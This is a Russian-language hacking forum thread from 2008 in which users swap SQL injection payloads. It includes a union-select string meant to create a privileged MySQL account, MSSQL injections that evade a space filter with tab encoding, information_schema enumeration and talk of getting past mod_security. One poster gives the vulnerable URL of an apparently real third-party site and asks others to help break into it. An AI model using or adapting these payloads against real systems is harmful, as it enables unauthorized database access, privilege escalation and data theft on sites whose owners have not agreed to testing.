 |
|
18.01.2008, 19:56
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 58
С нами:
9650471
Репутация:
-2
|
|
news.php?id=850+union+select+0,1,2,3,4,GRANT+ALL+P RIVILEGES+ON+*.*+TO+0xek@%+IDENTIFIED+BY+"паро ль"+WITH+GRANT+OPTION,6,7+from+mysql.user/*
таг?) откуда столько Y :PP
|
|
|
18.01.2008, 20:11
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами:
10516826
Репутация:
3742
|
|
не получится, если идет select ты никак не проведешь update или любой другой запрос кроме select и union select
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
19.01.2008, 17:42
|
|
Новичок
Регистрация: 19.01.2008
Сообщений: 9
С нами:
9636659
Репутация:
5
|
|
Такая проблемка, в MSSQL обычная инъекция /rating.asp?sender=1'
sender при вводе фильтруется на пробел, плюс и дефис. Пробел заменил на таб %09, не знаю что с дефисом сделать. А без него не закомментить ненужную часть запроса,
там остаётся: ' order by blablabla
Другой комент /* выдаёт ошибку, # тоже не коментит =\
Например
Код:
sender=5'%09UNION%09SELECT%09*%09FROM%09INFORMATION_SCHEMA.TABLES%23
вызывает ошибку
Microsoft OLE DB Provider for SQL Server ошибка '80040e14'
Unclosed quotation mark after the character string ' group by sender'.
т.е. строка получается:
Код:
INFORMATION_SCHEMA.TABLES#' group by sender'.
Можно это как-то обойти? |
|
|
|
19.01.2008, 19:11
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
С нами:
10261766
Репутация:
1079
|
|
Можно. Просто сделать второй юнион  |
|
|
|
19.01.2008, 19:50
|
|
Новичок
Регистрация: 19.01.2008
Сообщений: 9
С нами:
9636659
Репутация:
5
|
|
Сообщение от Macro
Можно. Просто сделать второй юнион пробовал, но ещё бы я знал названия таблиц и колнок 
|
|
|
|
19.01.2008, 20:14
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
С нами:
10261766
Репутация:
1079
|
|
Сообщение от PunkAss
пробовал, но ещё бы я знал названия таблиц и колнок Ну information_schema должна быть.
Код:
script.asp?sender=1'%09union%09select%09*%09from%09information_schema.tables%09union%09select%09null
Что-то типа того
|
|
|
|
19.01.2008, 22:24
|
|
Новичок
Регистрация: 19.01.2008
Сообщений: 9
С нами:
9636659
Репутация:
5
|
|
Сообщение от Macro
Что-то типа того
Блин, никак не канает 
Узнал по ошибкам, что таблица rating, есть колонки ID и Sender.
Код:
=5'%09UNION%09SELECT%09sender%09FROM%09rating%09WHERE%09'1'='1
ошибка:
Column 'rating.Sender' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
т.е. запрос "SELECT sender FROM rating WHERE '1'='1' group by sender" не канает... хз какой там оригинальный запрос 
|
|
|
|
20.01.2008, 02:20
|
|
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
С нами:
9847919
Репутация:
1446
|
|
1.Как можно извернуться в случае если фильтруется (хз как назвать) слово select, как только пишешь в запрос
?id=6+union+select
сразу появляется:
Код:
Precondition Failed
The request was not completed due to preconditions that are set in the request header.
Preconditions prevent the requested method from being applied to a resource other than the one intended.
2. И что еще делать если отсутствуют выводимые поля?
Последний раз редактировалось Momiji; 20.01.2008 в 02:24..
|
|
|
|
20.01.2008, 09:43
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
2Momiji
1. Не могу сказать точно, но думаю что на серваке стоит mod_security, если это так, то имхо бесполезно
2. почитай про Blind sql инъекции, на ачате полно статей и ответов на этот вопрос
2PunkAss
имхо фигню делаешь, кроме того что в mssql возможно разделение запросов, ты union select неправильно используешь, да и вобще, если очень надо кидай сюда ссыль посмотрим
__________________
Карфаген должен быть разрушен...
|
|
|
|
20.01.2008, 10:48
|
|
Новичок
Регистрация: 19.01.2008
Сообщений: 9
С нами:
9636659
Репутация:
5
|
|
http://cleverclub.nashe.ru/rating_d.asp?sender=1'
Да вся проблема правильно закончить свой запрос, чтобы в итоге общий был верный. Плохо скуль знаю, научите  |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
